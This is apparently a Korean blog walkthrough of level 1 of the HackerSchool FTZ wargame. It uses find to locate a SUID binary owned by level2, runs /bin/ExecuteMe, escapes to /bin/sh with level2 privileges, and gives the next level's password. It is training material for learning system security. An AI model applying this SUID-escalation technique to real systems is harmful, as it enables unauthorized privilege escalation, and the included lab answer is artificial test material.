id level1
passwd level1
ls -al
hint가 보인다 hint를 보자
cat hint
find / -user level2 -perm -4000
permission denied 가 아닌 /bin/ExecuteMe 파일을 확인한다.
cd /bin/
./ExecuteMe
./ExecuteMe
현재 level 1의 권한이므로
/bin/sh 쉘을 실행한다.
이제 level2 의 권한이므로 my-pass를 실행
level1 의 문제를 해결하였다
level2의 패스워드는 hacker or cracker
'시스템 해킹' 카테고리의 다른 글
| HackerSchool FTZ - 3 (0) | 2024.05.23 |
|---|---|
| HackerSchool FTZ - 2 (0) | 2024.05.23 |
| HackerSchool FTZ trainning 전체 (0) | 2024.05.23 |
| 포멧스트링 버그 - 데이터쓰기 (0) | 2024.05.19 |
| 포멧 스트링 버그 읽기 (0) | 2024.05.19 |